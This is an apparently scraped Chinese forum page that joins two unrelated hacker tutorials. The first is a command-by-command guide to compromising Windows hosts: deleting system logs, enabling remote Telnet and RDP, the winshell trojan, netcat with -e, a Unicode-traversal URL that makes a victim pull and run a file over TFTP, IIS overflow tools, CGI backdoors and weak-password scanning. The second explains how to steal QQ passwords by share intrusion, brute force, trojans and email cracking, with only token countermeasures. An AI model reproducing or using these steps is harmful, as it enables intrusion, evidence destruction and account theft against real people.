del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

netsvc /list \\IP地址

netsvc schedule \\IP地址 /query

netsvc \\IP地址 schedule /start

二、OpenTelnet.exe

远程启动主机的Telnet服务,并绑定端口到7878,例如:

OpenTelnet \\IP地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:

p Path (查看winshell主程序的路径信息)

b reBoot (重新启动机器)

d shutDown (关闭机器)

s Shell (执行后你就会看到可爱的“C:\”)

x eXit (退出本次登录会话,此命令并不终止winshell的运行)

CMD (通过http下载其他网站上的文件到运行winshell的机器上)

四、3389登陆器,GUI方式登录远程主机的

五、elsave.exe

事件日志清除工具

elsave -s \\IP地址 -l "application" -C

elsave -s \\IP地址 -l "system" -C

elsave -s \\IP地址 -l "security" -C

执行后成功清除应用程序日志,系统日志,安全日志

六、hbulot.exe

开启win2kserver和winxp的3389服务

hbulot [/r]

使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

想要连接到某处: nc [-options] hostname port[s] [ports] ...

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 任意指定本地及远程端口

-s addr 本地源地址

-u UDP模式

-v 详细输出——用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉——用于扫描时

八、TFTPD32.EXE

把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件运行:

地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、 prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用 telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp 下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

一、一 Xscan命令行运行参数说明:

在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。

1.命令格式: xscan -host [-] [其他选项]

xscan -file [其他选项]

其中 含义如下:

-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);

-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);

[其他选项] 含义如下:

-v: 显示详细扫描进度

-p: 跳过Ping不通的主机

-o: 跳过没有检测到开放端口的主机

-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10

采纳我吧 谢谢

96243464942654怎么破译

一、本地破解

方法:

这个办法的首要条件是你所在的机器开过你想要的QQ号,这又分两种情况,一是你所在的机器真的曾经开过这个号码,二是通过共享入侵得到你想要的号码的整个目录,把它拷贝到你的OICQ的目录下,启动OICQ你就能在号码选择下拉列表中看到这个号码了。共享入侵请参看本站黑客教程之对共享主机的简单入侵 ,网上硬盘共享最多的就是网吧和公司,而前者的硬盘里存有大量的QQ号码,只要你能进去且它的OICQ目录或它所在的分区是共享的话,自己慢慢挑吧。但是网上的IP多如牛毛,如何知道这个IP是网吧的呢,站长推荐本站聊天工具中的一个工具:WhoCQII FULL版,这个东东能让你探查一段指定IP地址里所开的OICQ,如果有哪一个IP打开了一串QQ,十有八九这就是网吧了,这时候你可以用本站网络监控中的飘叶网际隧道1.0 ,这个工具是专门用来入侵网络共享硬盘的,使用它你必须安装Microsoft网络用户,使你的桌面上有一个网上邻居,且必须安装NETBEUI等协议,即可接入对等网。输入它的IP,再输入你所猜测的共享名,也就是它所共享分区或目录的名字,如果对了的话,恭喜你,你进去了,选择你要的号码吧!

下一步就是破解了,破解密码最常用的办法是穷举,也就是暴力破解了。你可以从本站密码破解下一个暴力破解器。我推荐 Pw Check 1.02 ,这个软件虽说是破解共享软件注册码的,其实就是一个暴力破解器,使用方法:首先在按键一和按键二都选择Enter,保存设置,然后读取一个字典,打开OICQ,选择你想破解的号码,随意输入一个密码,选登录,它会弹出一个对话框“输入密码与上次成功登录的密码不一致,是否到服务器验证”(除了你运气好得没话说,一次对了,这个对话框就不会出现^-^)选“否”,然后在“请再次输入登录密码”对话框的空白处按下*键,就开始破解了,再次按*键停止。停止后可以保存进度,以便下次可以继续进度,字典输入完后会自动停止。这个工具免费注册。破解密码要用到字典,还有网友来信问我什么是字典,你真是!@#$%,字典是你所猜测密码的组合,格式通常为DIC,TXT,一行一个,破解器会逐行取出测试,直到密码正确和字典用完为止。这里你可以用本站字典工具中的万能钥匙 ,它是一个符合中国人习惯的字典生成机。生成的字典大小最好不要大于10Mb,要是字典过大可以用分割软件将其分成几个部分。否则容易死机!!!

对策:

从上面知道,破解密码通常是穷举。不要用简单的英文和纯数字作为密码,应该是大小写、数字、符号的混合,不要少于八位,这样的话密码就不容易被破了。再有就是网吧最好不要把重要的分区和文件夹共享出来,比如:C:\、OICQ、FOXMAIL......

二、在线破解

方法:

在线破解QQ密码的工具叫OICQHACK,本站密码破解有这个工具和它的注册机,未注册前扫描模式与号码列表模式将被禁用。注册方法参看压缩包内readme,这里我就不赘述了。运行OICQHACK后界面如下:

From: [10001] To:[10009]

此栏为扫描的 OICQ 号码范围,选中 [V] Scan Mode 即可开启扫描模式进行多号码探测,缺省为单个号码探测模式.

注意:扫描模式第一轮密码是低速探测,因此会较慢之后将自动开启高速扫描智能跳过不存在的空号,探测速度最高可达每秒100次.

Uin File: [Uin.dic]

此栏填写OICQ号码列表文件路径以及文件名,号码列表文件格式请参照 uin.dic ,选中 [V] Uin File 即可开启号码文件列表模式,读取列表文件中OICQ号码进行密码探测.

Dict Path: [Password.dic]

此栏填写密码字典路径以及文件名,密码列表文件格式请参照 password.dic ,选中 [V] Password File 即可开启密码字典模式,进行常用密码探测,缺省为 Brute Force 暴力破解.

[V] 0123456789

[. .] abcdefghijklmnopqrstuvwxyz

[. .] ABCDEFGHIJKLMNOPQRSTUVWXYZ

[. .] .,:?!+-*/@$#%|\~`^_()[]{}

此处选取 Brute Force 密码范围.

Password Length: [3]

此处选取 Brute Force 密码长度.

注意:以下设置建议使用默认值.

Max Threads: [ 16 ]

最大并发连接线程数,与探测速度和超时错误率成正比,取值视机器性能而定.

Timeout: [ 32 ]

超时等待时间,单位秒,与超时错误率和探测速度成反比,取值视你的耐心而定.

SP: 既非扫描模式也非号码文件列表模式的单号码探测由于受到服务器登陆时间限制会很慢,只能达到每秒1次,因此应尽量将待测号码做成列表文件进行批量探测。在批量扫描探测加密码字典模式下适当选取线程超时值能提高效率,最快可高达每秒100次.

这个工具同样需要字典穷举!

对策:

同样是密码设定和长度的问题,密码够长,且是大小写、符号、数字的组合,你的密码就相对安全些!

三、另类破解

1、使用工具

方法:

本站聊天工具中有一个工具叫:OICQ密码瞬间破解器 V1.02 它能破解出本地各OICQ号码的最后一个使用密码,只要该号码曾经选择过“下次登陆不显示登陆框”参数。软件即可以在瞬间得到这个QQ密码!

对策:

登录时不要选择“保存密码”

2、使用木马

方法:

在被害人的机器上运行木马的客户端,它就能自行记录每位登录者的OICQ号码和它的密码。有的木马能把结果发回你的信箱,如:Get Oicq Password,有的要你回到该机器查看记录文件,如:KillOicq0.1,oicqmima,Oicq密码记录器,OICQ 潜伏者单机版 Beta 1.2,蜘蛛OICQPass beta 1......以上工具都能在本站聊天工具找到。

对策:

防范当然是第一的,不要运行来历不明的软件(本站的除外,呵呵)Get Oicq Password木马的查杀工具叫KILLGOP,本站聊天工具中有。其他的木马可以试试Ctrl+Alt+Del查看进程,发现可疑的立即杀掉,还有的木马不会在进程栏里显示出来,这就关系到注册表了,请参看本站黑客教程中的几篇关于木马的文章。

3、使用邮箱

方法:

因为腾讯验证密码时要用到你的邮箱,它会把密码发回注册这个号码时所填的邮箱里。所以破解邮箱也不失为一个好办法。通常别人的个人资料里所填的邮箱就是他的验证邮箱。看中了他的号码吗,破掉他的邮箱密码吧。站长推荐的工具是密码破解中的Tetrp FTP/POP Passwd Trier,这是一个专门用于破解邮箱的工具,也是暴力破解,同样要用字典

0条大神的评论

发表评论